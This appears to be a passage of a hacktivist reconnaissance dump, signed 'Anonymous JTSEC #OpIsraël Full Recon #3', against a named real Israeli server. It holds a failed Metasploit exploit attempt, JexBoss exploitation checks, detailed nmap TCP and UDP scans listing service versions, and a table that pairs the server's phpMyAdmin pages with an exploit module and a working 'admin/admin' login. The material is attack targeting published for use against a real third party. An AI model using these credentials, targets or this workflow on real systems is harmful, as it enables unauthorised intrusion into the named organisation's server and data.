3621[-] Exploit aborted due to failure: not-found: The target server fingerprint "Apache/2" does not match "(?-mix:Apache.*(Coyote|Tomcat))", use 'set FingerprintCheck false' to disable this check.
3622[*] Exploit completed, but no session was created.
3623#######################################################################################################################################
3624
3625
3626
3627 * --- JexBoss: Jboss verify and EXploitation Tool --- *
3628 | * And others Java Deserialization Vulnerabilities * |
3629 | |
3630 | @author: João Filho Matos Figueiredo |
3631 | @contact: joaomatosf@gmail.com |
3632 | |
3633 | @update: https://github.com/joaomatosf/jexboss |
3634 #______________________________________________________#
3635
3636 @version: 1.2.4
3637
3638 * Checking for updates in: http://joaomatosf.com/rnp/releases.txt **
3639
3640
3641 ** Checking Host: http://62.90.134.182:8080 **
3642
3643 [*] Checking admin-console: [ OK ]
3644 [*] Checking Struts2: [ OK ]
3645 [*] Checking Servlet Deserialization: [ OK ]
3646 [*] Checking Application Deserialization: [ OK ]
3647 [*] Checking Jenkins: [ OK ]
3648 [*] Checking web-console: [ OK ]
3649 [*] Checking jmx-console: [ OK ]
3650 [*] Checking JMXInvokerServlet: [ OK ]
3651
3652
3653 * Results:
3654 The server is not vulnerable to bugs tested ... :D
3655
3656 * Info: review, suggestions, updates, etc:
3657 https://github.com/joaomatosf/jexboss
3658
3659 * DONATE: Please consider making a donation to help improve this tool,
3660 * Bitcoin Address: 14x4niEpfp7CegBYr3tTzTn4h6DAnDCD9C
3661#######################################################################################################################################
3662+------------+----------------------------------------+--------------------------------------------------+-----------+-----------+
3663| App Name | URL to Application | Potential Exploit | Username | Password |
3664+------------+----------------------------------------+--------------------------------------------------+-----------+-----------+
3665| phpMyAdmin | https://62.90.134.182:8081/phpmyadmin/ | ./exploits/multi/http/phpmyadmin_preg_replace.rb | Not Found | Not Found |
3666| phpMyAdmin | https://62.90.134.182:443/phpmyadmin/ | ./exploits/multi/http/phpmyadmin_preg_replace.rb | admin | admin |
3667+------------+----------------------------------------+--------------------------------------------------+-----------+-----------+
3668#######################################################################################################################################
3669Starting Nmap 7.70SVN ( https://nmap.org ) at 2019-01-23 04:59 EST
3670NSE: Loaded 149 scripts for scanning.
3671NSE: Script Pre-scanning.
3672NSE: Starting runlevel 1 (of 3) scan.
3673Initiating NSE at 04:59
3674Completed NSE at 04:59, 0.00s elapsed
3675NSE: Starting runlevel 2 (of 3) scan.
3676Initiating NSE at 04:59
3677Completed NSE at 04:59, 0.00s elapsed
3678NSE: Starting runlevel 3 (of 3) scan.
3679Initiating NSE at 04:59
3680Completed NSE at 04:59, 0.00s elapsed
3681Initiating Ping Scan at 04:59
3682Scanning 62.90.134.182 [4 ports]
3683Completed Ping Scan at 04:59, 0.27s elapsed (1 total hosts)
3684Initiating Parallel DNS resolution of 1 host. at 04:59
3685Completed Parallel DNS resolution of 1 host. at 04:59, 0.02s elapsed
3686Initiating Connect Scan at 04:59
3687Scanning server.webid.co.il (62.90.134.182) [1000 ports]
3688Discovered open port 3306/tcp on 62.90.134.182
3689Discovered open port 80/tcp on 62.90.134.182
3690Discovered open port 53/tcp on 62.90.134.182
3691Discovered open port 995/tcp on 62.90.134.182
3692Discovered open port 993/tcp on 62.90.134.182
3693Discovered open port 21/tcp on 62.90.134.182
3694Discovered open port 443/tcp on 62.90.134.182
3695Discovered open port 110/tcp on 62.90.134.182
3696Discovered open port 143/tcp on 62.90.134.182
3697Discovered open port 587/tcp on 62.90.134.182
3698Discovered open port 8080/tcp on 62.90.134.182
3699Discovered open port 5060/tcp on 62.90.134.182
3700Discovered open port 8081/tcp on 62.90.134.182
3701Discovered open port 465/tcp on 62.90.134.182
3702Discovered open port 2000/tcp on 62.90.134.182
3703Discovered open port 2222/tcp on 62.90.134.182
3704Completed Connect Scan at 04:59, 11.65s elapsed (1000 total ports)
3705Initiating Service scan at 04:59
3706Scanning 16 services on server.webid.co.il (62.90.134.182)
3707Completed Service scan at 05:00, 21.13s elapsed (16 services on 1 host)
3708Initiating OS detection (try #1) against server.webid.co.il (62.90.134.182)
3709Retrying OS detection (try #2) against server.webid.co.il (62.90.134.182)
3710adjust_timeouts2: packet supposedly had rtt of -503282 microseconds. Ignoring time.
3711adjust_timeouts2: packet supposedly had rtt of -503282 microseconds. Ignoring time.
3712Initiating Traceroute at 05:00
3713Completed Traceroute at 05:00, 3.03s elapsed
3714Initiating Parallel DNS resolution of 15 hosts. at 05:00
3715Completed Parallel DNS resolution of 15 hosts. at 05:00, 16.51s elapsed
3716NSE: Script scanning 62.90.134.182.
3717NSE: Starting runlevel 1 (of 3) scan.
3718Initiating NSE at 05:00
3719NSE Timing: About 99.90% done; ETC: 05:01 (0:00:00 remaining)
3720Completed NSE at 05:01, 33.12s elapsed
3721NSE: Starting runlevel 2 (of 3) scan.
3722Initiating NSE at 05:01
3723NSE Timing: About 90.62% done; ETC: 05:01 (0:00:03 remaining)
3724NSE Timing: About 91.41% done; ETC: 05:02 (0:00:06 remaining)
3725NSE Timing: About 92.19% done; ETC: 05:02 (0:00:08 remaining)
3726NSE Timing: About 92.97% done; ETC: 05:03 (0:00:09 remaining)
3727NSE Timing: About 94.53% done; ETC: 05:03 (0:00:09 remaining)
3728NSE Timing: About 99.22% done; ETC: 05:04 (0:00:01 remaining)
3729Completed NSE at 05:04, 207.31s elapsed
3730NSE: Starting runlevel 3 (of 3) scan.
3731Initiating NSE at 05:04
3732Completed NSE at 05:04, 0.00s elapsed
3733Nmap scan report for server.webid.co.il (62.90.134.182)
3734Host is up, received echo-reply ttl 47 (0.17s latency).
3735Scanned at 2019-01-23 04:59:37 EST for 302s
3736Not shown: 797 closed ports, 187 filtered ports
3737Reason: 797 conn-refused and 187 no-responses
3738PORT STATE SERVICE REASON VERSION
373921/tcp open ftp syn-ack ProFTPD
3740|_ssl-date: TLS randomness does not represent time
3741| tls-alpn:
3742|_ ftp
3743| tls-nextprotoneg:
3744|_ ftp
374553/tcp open domain syn-ack ISC BIND 9.9.4 (RedHat Enterprise Linux 7)
3746| dns-nsid:
3747|_ bind.version: 9.9.4-RedHat-9.9.4-61.el7
374880/tcp open http syn-ack nginx
3749| http-methods:
3750|_ Supported Methods: GET HEAD POST
3751|_http-server-header: nginx
3752|_http-title: Site doesn't have a title (text/html).
3753110/tcp open pop3 syn-ack Dovecot DirectAdmin pop3d
3754|_pop3-capabilities: AUTH-RESP-CODE USER PIPELINING CAPA SASL(PLAIN) UIDL TOP STLS RESP-CODES
3755|_ssl-date: TLS randomness does not represent time
3756143/tcp open imap syn-ack Dovecot imapd
3757|_imap-capabilities: OK ID more have listed capabilities post-login LITERAL+ Pre-login IMAP4rev1 STARTTLS IDLE LOGIN-REFERRALS SASL-IR ENABLE AUTH=PLAINA0001
3758|_ssl-date: TLS randomness does not represent time
3759443/tcp open ssl/http syn-ack nginx
3760| http-methods:
3761|_ Supported Methods: GET HEAD POST
3762|_http-server-header: nginx
3763|_http-title: Site doesn't have a title (text/html).
3764| ssl-cert: Subject: commonName=localhost/organizationName=none/stateOrProvinceName=Someprovince/countryName=US/localityName=Sometown/emailAddress=webmaster@localhost/organizationalUnitName=none
3765| Issuer: commonName=localhost/organizationName=none/stateOrProvinceName=Someprovince/countryName=US/localityName=Sometown/emailAddress=webmaster@localhost/organizationalUnitName=none
3766| Public Key type: rsa
3767| Public Key bits: 2048
3768| Signature Algorithm: sha1WithRSAEncryption
3769| Not valid before: 2014-09-20T10:18:07
3770| Not valid after: 2042-02-04T10:18:07
3771| MD5: 97da b648 4f2a ad48 4f97 84fd 6789 b7bb
3772| SHA-1: 2e3f 643e 5d11 a459 bd85 ab36 e5e5 593f 04c8 e51f
3773| -----BEGIN CERTIFICATE-----
3774| MIIDmDCCAoACCQCZ91j/rN7tyzANBgkqhkiG9w0BAQUFADCBjTELMAkGA1UEBhMC
3775| VVMxFTATBgNVBAgTDFNvbWVwcm92aW5jZTERMA8GA1UEBxMIU29tZXRvd24xDTAL
3776| BgNVBAoTBG5vbmUxDTALBgNVBAsTBG5vbmUxEjAQBgNVBAMTCWxvY2FsaG9zdDEi
3777| MCAGCSqGSIb3DQEJARYTd2VibWFzdGVyQGxvY2FsaG9zdDAeFw0xNDA5MjAxMDE4
3778| MDdaFw00MjAyMDQxMDE4MDdaMIGNMQswCQYDVQQGEwJVUzEVMBMGA1UECBMMU29t
3779| ZXByb3ZpbmNlMREwDwYDVQQHEwhTb21ldG93bjENMAsGA1UEChMEbm9uZTENMAsG
3780| A1UECxMEbm9uZTESMBAGA1UEAxMJbG9jYWxob3N0MSIwIAYJKoZIhvcNAQkBFhN3
3781| ZWJtYXN0ZXJAbG9jYWxob3N0MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKC
3782| AQEAr/uRtz74Kc4qIEnSgfQQgY+r3EyOCRPcIoTGbcukLIwe9sP2PdMIYeonuEh4
3783| bshnBLjjtk6CzcOK9s1Vb1CW4Vmtb5eI1TNcsokAUVV5llTZEfIuY2UtroV8W2LI
3784| WZ6VxbwEzd+UeeGrHiMUc9O94sxU/fDo5ttAdElgfIEp+uR5qDG2VzpE5F7Lc61L
3785| CF7xFUrxRMgCYYCYmr7Zs/FNY2nU920i7hRco6bgRQeQvAC+KFKsHuUzyq08g3Q6
3786| 0V6DCBmAaq5Ku4QzQBGSFRXb/6jYYhGYxO4f6VsxLrBA7LL0kwUL+YCjXCz1iK3R
3787| 6kiVRcyJqtWahOHDq3YKaLtr1wIDAQABMA0GCSqGSIb3DQEBBQUAA4IBAQA+4fjC
3788| b19T78ZHZNXZodf7Tpl8PMY6ljd6nU9dokYwvnFgR9anGpTfXipcGDSorEdFMBqH
3789| 5cPN/yu6SNRQaLnYwqII9we2HDMFAnYlvCb1vNSSp2k+KIf6nEEvE2B0zfL7+dHJ
3790| 0rJyggNXT0VTs7ZI9PM/RlPH75khNHD7U3Vz4NSBVm7oTVg8VZhExKhS2JTy2zii
3791| WjGPVzBbMzGioZhHE/b96M70o+89fxkE+g3oNJLAZJfao2qy5oiLAt1spCPQ40HW
3792| hPzHGuGIMABG+263nikmVG0m0A3JTYQLfgBqxiBkauP6kT3KszTGXWUduj/9YHRW
3793| Mkh66D1gfgB2ubts
3794|_-----END CERTIFICATE-----
3795|_ssl-date: TLS randomness does not represent time
3796| tls-alpn:
3797| h2
3798|_ http/1.1
3799| tls-nextprotoneg:
3800| h2
3801|_ http/1.1
3802465/tcp open ssl/smtp syn-ack Exim smtpd 4.91
3803|_smtp-commands: Couldn't establish connection on port 465
3804| ssl-cert: Subject: commonName=localhost/organizationName=none/stateOrProvinceName=Someprovince/countryName=GB/localityName=Sometown/emailAddress=webaster@localhost/organizationalUnitName=none
3805| Issuer: commonName=localhost/organizationName=none/stateOrProvinceName=Someprovince/countryName=GB/localityName=Sometown/emailAddress=webaster@localhost/organizationalUnitName=none
3806| Public Key type: rsa
3807| Public Key bits: 1024
3808| Signature Algorithm: sha1WithRSAEncryption
3809| Not valid before: 2014-07-29T06:26:14
3810| Not valid after: 2041-12-13T06:26:14
3811| MD5: 4b29 2c8a 525a d420 e4f7 78c1 45d2 4ed9
3812| SHA-1: cc0a 349f 83d9 4d41 d316 0e7a a751 ce8d 5322 7241
3813| -----BEGIN CERTIFICATE-----
3814| MIICkTCCAfoCCQD3JF1s3Ui7BzANBgkqhkiG9w0BAQUFADCBjDELMAkGA1UEBhMC
3815| R0IxFTATBgNVBAgTDFNvbWVwcm92aW5jZTERMA8GA1UEBxMIU29tZXRvd24xDTAL
3816| BgNVBAoTBG5vbmUxDTALBgNVBAsTBG5vbmUxEjAQBgNVBAMTCWxvY2FsaG9zdDEh
3817| MB8GCSqGSIb3DQEJARYSd2ViYXN0ZXJAbG9jYWxob3N0MB4XDTE0MDcyOTA2MjYx
3818| NFoXDTQxMTIxMzA2MjYxNFowgYwxCzAJBgNVBAYTAkdCMRUwEwYDVQQIEwxTb21l
3819| cHJvdmluY2UxETAPBgNVBAcTCFNvbWV0b3duMQ0wCwYDVQQKEwRub25lMQ0wCwYD
3820| VQQLEwRub25lMRIwEAYDVQQDEwlsb2NhbGhvc3QxITAfBgkqhkiG9w0BCQEWEndl
3821| YmFzdGVyQGxvY2FsaG9zdDCBnzANBgkqhkiG9w0BAQEFAAOBjQAwgYkCgYEA5Euc
3822| SYOuqLn4h5hktsteODz8pR6VsFNktHT+tgSHoEPeJ/2S1efAY/zoMRhwXo9k9RVc
3823| S11EDYVjzGrQeni2/o0rFC3kCJI37P4AHbaQg7BJlyqVW9BHQaHW++gknGH8L2XF
3824| DC97iiawhWQIEF06Hg8319FHZZBdTEi3w5A0R10CAwEAATANBgkqhkiG9w0BAQUF
3825| AAOBgQBT5tKhGxu0mGTfi9dP8q21FSzhyR9G5n7uGL/+3Bl7Six7w9l+4HOy3zMl
3826| VvJTXWh+FGInAytzBf4BzC3D84qo13B8w13tivpdNf1o1WV65fgBZZTmak/KCbZf
3827| 9BHpO92XZPxlmPCEPoMmyXN0dVM8jZmbI6LvFZZS1EBIPx9fng==
3828|_-----END CERTIFICATE-----
3829|_ssl-date: TLS randomness does not represent time
3830587/tcp open smtp syn-ack Exim smtpd 4.91
3831|_smtp-commands: SMTP: EHLO 550 Bad HELO - Host impersonating hostname [server.webid.co.il]\x0D
3832993/tcp open ssl/imaps? syn-ack
3833|_ssl-date: TLS randomness does not represent time
3834995/tcp open ssl/pop3s? syn-ack
3835|_ssl-date: TLS randomness does not represent time
38362000/tcp open tcpwrapped syn-ack
38372222/tcp open http syn-ack DirectAdmin httpd 1.53.0 (Registered to webid.co.il)
3838|_http-favicon: Unknown favicon MD5: F0CC6DDDAE553AA7CFEB2CA5B62B2083
3839| http-methods:
3840|_ Supported Methods: GET HEAD POST
3841|_http-server-header: DirectAdmin Daemon v1.53.0 Registered to webid.co.il
3842|_http-title: DirectAdmin Login
3843|_http-trane-info: Problem with XML parsing of /evox/about
38443306/tcp open mysql syn-ack MySQL 5.5.60-MariaDB
3845| mysql-info:
3846| Protocol: 10
3847| Version: 5.5.60-MariaDB
3848| Thread ID: 11690366
3849| Capabilities flags: 63487
3850| Some Capabilities: Support41Auth, SupportsLoadDataLocal, LongPassword, Speaks41ProtocolOld, SupportsTransactions, IgnoreSigpipes, ODBCClient, ConnectWithDatabase, IgnoreSpaceBeforeParenthesis, FoundRows, InteractiveClient, LongColumnFlag, Speaks41ProtocolNew, DontAllowDatabaseTableColumn, SupportsCompression, SupportsMultipleResults, SupportsMultipleStatments, SupportsAuthPlugins
3851| Status: Autocommit
3852| Salt: >|w^Tf(/U?ygxE-S8^R_
3853|_ Auth Plugin Name: mysql_native_password
38545060/tcp open tcpwrapped syn-ack
38558080/tcp open ssl/http-proxy syn-ack Apache/2
3856| http-methods:
3857|_ Supported Methods: GET POST OPTIONS HEAD
3858|_http-open-proxy: Proxy might be redirecting requests
3859|_http-server-header: Apache/2
3860|_http-title: Site doesn't have a title (text/html).
38618081/tcp open ssl/ssl syn-ack Apache httpd (SSL-only mode)
3862| ssl-cert: Subject: commonName=localhost/organizationName=none/stateOrProvinceName=Someprovince/countryName=US/localityName=Sometown/emailAddress=webmaster@localhost/organizationalUnitName=none
3863| Issuer: commonName=localhost/organizationName=none/stateOrProvinceName=Someprovince/countryName=US/localityName=Sometown/emailAddress=webmaster@localhost/organizationalUnitName=none
3864| Public Key type: rsa
3865| Public Key bits: 2048
3866| Signature Algorithm: sha1WithRSAEncryption
3867| Not valid before: 2014-09-20T10:18:07
3868| Not valid after: 2042-02-04T10:18:07
3869| MD5: 97da b648 4f2a ad48 4f97 84fd 6789 b7bb
3870| SHA-1: 2e3f 643e 5d11 a459 bd85 ab36 e5e5 593f 04c8 e51f
3871| -----BEGIN CERTIFICATE-----
3872| MIIDmDCCAoACCQCZ91j/rN7tyzANBgkqhkiG9w0BAQUFADCBjTELMAkGA1UEBhMC
3873| VVMxFTATBgNVBAgTDFNvbWVwcm92aW5jZTERMA8GA1UEBxMIU29tZXRvd24xDTAL
3874| BgNVBAoTBG5vbmUxDTALBgNVBAsTBG5vbmUxEjAQBgNVBAMTCWxvY2FsaG9zdDEi
3875| MCAGCSqGSIb3DQEJARYTd2VibWFzdGVyQGxvY2FsaG9zdDAeFw0xNDA5MjAxMDE4
3876| MDdaFw00MjAyMDQxMDE4MDdaMIGNMQswCQYDVQQGEwJVUzEVMBMGA1UECBMMU29t
3877| ZXByb3ZpbmNlMREwDwYDVQQHEwhTb21ldG93bjENMAsGA1UEChMEbm9uZTENMAsG
3878| A1UECxMEbm9uZTESMBAGA1UEAxMJbG9jYWxob3N0MSIwIAYJKoZIhvcNAQkBFhN3
3879| ZWJtYXN0ZXJAbG9jYWxob3N0MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKC
3880| AQEAr/uRtz74Kc4qIEnSgfQQgY+r3EyOCRPcIoTGbcukLIwe9sP2PdMIYeonuEh4
3881| bshnBLjjtk6CzcOK9s1Vb1CW4Vmtb5eI1TNcsokAUVV5llTZEfIuY2UtroV8W2LI
3882| WZ6VxbwEzd+UeeGrHiMUc9O94sxU/fDo5ttAdElgfIEp+uR5qDG2VzpE5F7Lc61L
3883| CF7xFUrxRMgCYYCYmr7Zs/FNY2nU920i7hRco6bgRQeQvAC+KFKsHuUzyq08g3Q6
3884| 0V6DCBmAaq5Ku4QzQBGSFRXb/6jYYhGYxO4f6VsxLrBA7LL0kwUL+YCjXCz1iK3R
3885| 6kiVRcyJqtWahOHDq3YKaLtr1wIDAQABMA0GCSqGSIb3DQEBBQUAA4IBAQA+4fjC
3886| b19T78ZHZNXZodf7Tpl8PMY6ljd6nU9dokYwvnFgR9anGpTfXipcGDSorEdFMBqH
3887| 5cPN/yu6SNRQaLnYwqII9we2HDMFAnYlvCb1vNSSp2k+KIf6nEEvE2B0zfL7+dHJ
3888| 0rJyggNXT0VTs7ZI9PM/RlPH75khNHD7U3Vz4NSBVm7oTVg8VZhExKhS2JTy2zii
3889| WjGPVzBbMzGioZhHE/b96M70o+89fxkE+g3oNJLAZJfao2qy5oiLAt1spCPQ40HW
3890| hPzHGuGIMABG+263nikmVG0m0A3JTYQLfgBqxiBkauP6kT3KszTGXWUduj/9YHRW
3891| Mkh66D1gfgB2ubts
3892|_-----END CERTIFICATE-----
3893|_ssl-date: TLS randomness does not represent time
3894| tls-alpn:
3895|_ http/1.1
3896OS fingerprint not ideal because: Didn't receive UDP response. Please try again with -sSU
3897Aggressive OS guesses: Linux 2.6.32 (93%), Linux 3.4 (93%), Synology DiskStation Manager 5.1 (92%), Linux 3.10 (92%), Linux 2.6.32 or 3.10 (92%), Linux 2.6.39 (92%), WatchGuard Fireware 11.8 (92%), Linux 3.1 - 3.2 (92%), Linux 2.6.32 - 2.6.39 (90%), Linux 3.2 - 3.8 (88%)
3898No exact OS matches for host (test conditions non-ideal).
3899TCP/IP fingerprint:
3900SCAN(V=7.70SVN%E=4%D=1/23%OT=21%CT=1%CU=%PV=N%DS=17%DC=T%G=N%TM=5C483C37%P=x86_64-unknown-linux-gnu)
3901SEQ(SP=10A%GCD=1%ISR=10C%TI=Z%II=I%TS=A)
3902SEQ(SP=10A%GCD=1%ISR=10C%TI=Z%TS=A)
3903OPS(O1=M4B3ST11NW7%O2=M4B3ST11NW7%O3=M4B3NNT11NW7%O4=M4B3ST11NW7%O5=M4B3ST11NW7%O6=M4B3ST11)
3904WIN(W1=3890%W2=3890%W3=3890%W4=3890%W5=3890%W6=3890)
3905ECN(R=Y%DF=Y%TG=40%W=3908%O=M4B3NNSNW7%CC=Y%Q=)
3906T1(R=Y%DF=Y%TG=40%S=O%A=S+%F=AS%RD=0%Q=)
3907T2(R=N)
3908T3(R=N)
3909T4(R=N)
3910T5(R=Y%DF=Y%TG=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)
3911T6(R=N)
3912T7(R=N)
3913U1(R=N)
3914IE(R=Y%DFI=N%TG=40%CD=S)
3915
3916Uptime guess: 25.499 days (since Fri Dec 28 17:06:06 2018)
3917Network Distance: 17 hops
3918TCP Sequence Prediction: Difficulty=266 (Good luck!)
3919IP ID Sequence Generation: All zeros
3920Service Info: OSs: Unix, Linux; CPE: cpe:/o:redhat:enterprise_linux:7
3921
3922TRACEROUTE (using proto 1/icmp)
3923HOP RTT ADDRESS
39241 143.99 ms 10.246.200.1
39252 144.80 ms vlan113.as01.sof1.bg.m247.com (193.9.115.113)
39263 144.04 ms vlan299.bb1.sof1.bg.m247.com (176.10.83.34)
39274 144.07 ms sfia-b2-link.telia.net (62.115.148.144)
39285 178.25 ms 62.115.119.76
39296 177.09 ms 62.115.133.79
39307 184.94 ms ffm-b1-link.telia.net (62.115.116.158)
39318 177.14 ms netvision-ic-309800-ffm-b11.c.telia.net (80.239.196.190)
39329 ...
393310 230.24 ms gw2-hfa-po10-gw1.nta.nv.net.il (212.143.12.32)
393411 230.92 ms gw2-hfa-po10-gw1.nta.nv.net.il (212.143.12.32)
393512 231.85 ms 212.143.7.247
393613 231.86 ms core2-rha-2-0-0-core2-hfa-5-0-7.nv.net.il (212.143.12.119)
393714 233.87 ms po231.srvc3.rha.nv.net.il (212.143.201.190)
393815 236.39 ms 82.166.37.254
393916 237.16 ms 62-90-134-178.barak.net.il (62.90.134.178)
394017 236.33 ms server.webid.co.il (62.90.134.182)
3941
3942NSE: Script Post-scanning.
3943NSE: Starting runlevel 1 (of 3) scan.
3944Initiating NSE at 05:04
3945Completed NSE at 05:04, 0.00s elapsed
3946NSE: Starting runlevel 2 (of 3) scan.
3947Initiating NSE at 05:04
3948Completed NSE at 05:04, 0.00s elapsed
3949NSE: Starting runlevel 3 (of 3) scan.
3950Initiating NSE at 05:04
3951Completed NSE at 05:04, 0.00s elapsed
3952Read data files from: /usr/local/bin/../share/nmap
3953OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
3954Nmap done: 1 IP address (1 host up) scanned in 302.87 seconds
3955 Raw packets sent: 101 (7.894KB) | Rcvd: 1371 (577.453KB)
3956######################################################################################################################################
3957Starting Nmap 7.70SVN ( https://nmap.org ) at 2019-01-23 05:04 EST
3958NSE: Loaded 149 scripts for scanning.
3959NSE: Script Pre-scanning.
3960Initiating NSE at 05:04
3961Completed NSE at 05:04, 0.00s elapsed
3962Initiating NSE at 05:04
3963Completed NSE at 05:04, 0.00s elapsed
3964Initiating NSE at 05:04
3965Completed NSE at 05:04, 0.00s elapsed
3966Initiating Parallel DNS resolution of 1 host. at 05:04
3967Completed Parallel DNS resolution of 1 host. at 05:04, 0.02s elapsed
3968Initiating UDP Scan at 05:04
3969Scanning server.webid.co.il (62.90.134.182) [13 ports]
3970Discovered open port 53/udp on 62.90.134.182
3971Completed UDP Scan at 05:04, 5.77s elapsed (13 total ports)
3972Initiating Service scan at 05:04
3973Scanning 1 service on server.webid.co.il (62.90.134.182)
3974Completed Service scan at 05:04, 0.34s elapsed (1 service on 1 host)
3975Initiating OS detection (try #1) against server.webid.co.il (62.90.134.182)
3976Retrying OS detection (try #2) against server.webid.co.il (62.90.134.182)
3977Initiating Traceroute at 05:04
3978Completed Traceroute at 05:04, 7.20s elapsed
3979Initiating Parallel DNS resolution of 1 host. at 05:04
3980Completed Parallel DNS resolution of 1 host. at 05:04, 0.02s elapsed
3981NSE: Script scanning 62.90.134.182.
3982Initiating NSE at 05:04
3983Completed NSE at 05:04, 0.69s elapsed
3984Initiating NSE at 05:04
3985Completed NSE at 05:04, 0.00s elapsed
3986Initiating NSE at 05:04
3987Completed NSE at 05:04, 0.00s elapsed
3988Nmap scan report for server.webid.co.il (62.90.134.182)
3989Host is up (0.32s latency).
3990
3991PORT STATE SERVICE VERSION
399253/udp open domain ISC BIND 9.9.4 (RedHat Enterprise Linux 7)
3993| dns-nsid:
3994|_ bind.version: 9.9.4-RedHat-9.9.4-61.el7
399567/udp closed dhcps
399668/udp closed dhcpc
399769/udp closed tftp
399888/udp closed kerberos-sec
3999123/udp closed ntp
4000137/udp filtered netbios-ns
4001138/udp filtered netbios-dgm
4002139/udp closed netbios-ssn
4003162/udp closed snmptrap
4004389/udp closed ldap
4005520/udp closed route
40062049/udp closed nfs
4007Too many fingerprints match this host to give specific OS details
4008Network Distance: 16 hops
4009Service Info: OS: Linux; CPE: cpe:/o:redhat:enterprise_linux:7
4010
4011TRACEROUTE (using port 137/udp)
4012HOP RTT ADDRESS
40131 ... 6
40147 144.45 ms 10.246.200.1
40158 ... 9
401610 142.52 ms 10.246.200.1
401711 146.42 ms 10.246.200.1
401812 146.40 ms 10.246.200.1
401913 146.39 ms 10.246.200.1
402014 146.39 ms 10.246.200.1
402115 146.38 ms 10.246.200.1
402216 146.39 ms 10.246.200.1
402317 ... 18
402419 144.29 ms 10.246.200.1
402520 144.57 ms 10.246.200.1
402621 144.71 ms 10.246.200.1
402722 ... 29
402830 142.65 ms 10.246.200.1
4029
4030NSE: Script Post-scanning.
4031Initiating NSE at 05:04
4032Completed NSE at 05:04, 0.00s elapsed
4033Initiating NSE at 05:04
4034Completed NSE at 05:04, 0.00s elapsed
4035Initiating NSE at 05:04
4036Completed NSE at 05:04, 0.00s elapsed
4037Read data files from: /usr/local/bin/../share/nmap
4038OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
4039Nmap done: 1 IP address (1 host up) scanned in 19.93 seconds
4040 Raw packets sent: 124 (9.536KB) | Rcvd: 2124 (547.988KB)
4041#######################################################################################################################################
4042 Anonymous JTSEC #OpIsraël Full Recon #3